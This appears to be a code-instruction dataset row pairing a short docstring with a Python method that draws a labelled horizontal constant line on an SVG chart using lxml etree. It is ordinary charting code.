'd': 'M 0 %(start)s h%(stop)s' % locals(),
'class': 'constantLine'})
if style:
path.set('style', style)
text = etree.SubElement(self.graph, 'text', {
'x': str(2),
'y': str(start - 2),
'class': 'constantLine'})
text.text = label | Draw a constant line on the y-axis with the label | Below is the the instruction that describes the task:
### Input:
Draw a constant line on the y-axis with the label
### Response:
def __draw_constant_line(self, value_label_style):
"Draw a constant line on the y-axis with the label"
value, label, style = value_label_style
start = self.transform_output_coordinates((0, value))[1]
stop = self.graph_width
path = etree.SubElement(self.graph, 'path', {
'd': 'M 0 %(start)s h%(stop)s' % locals(),
'class': 'constantLine'})
if style:
path.set('style', style)
text = etree.SubElement(self.graph, 'text', {
'x': str(2),
'y': str(start - 2),
'class': 'constantLine'})
text.text = label |
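For reference, the argument unpacked by the __draw_constant_line row above is a 3-tuple; how the surrounding chart class collects these tuples is not visible here, so the values below are purely illustrative.

# (y-axis value, label text, optional inline style; a falsy style falls back to the 'constantLine' CSS class)
constant_lines = [
    (50.0, 'threshold', 'stroke: red; stroke-dasharray: 4 2'),
    (75.0, 'target', ''),
]
# A chart class would typically call self.__draw_constant_line(t) for each such tuple t.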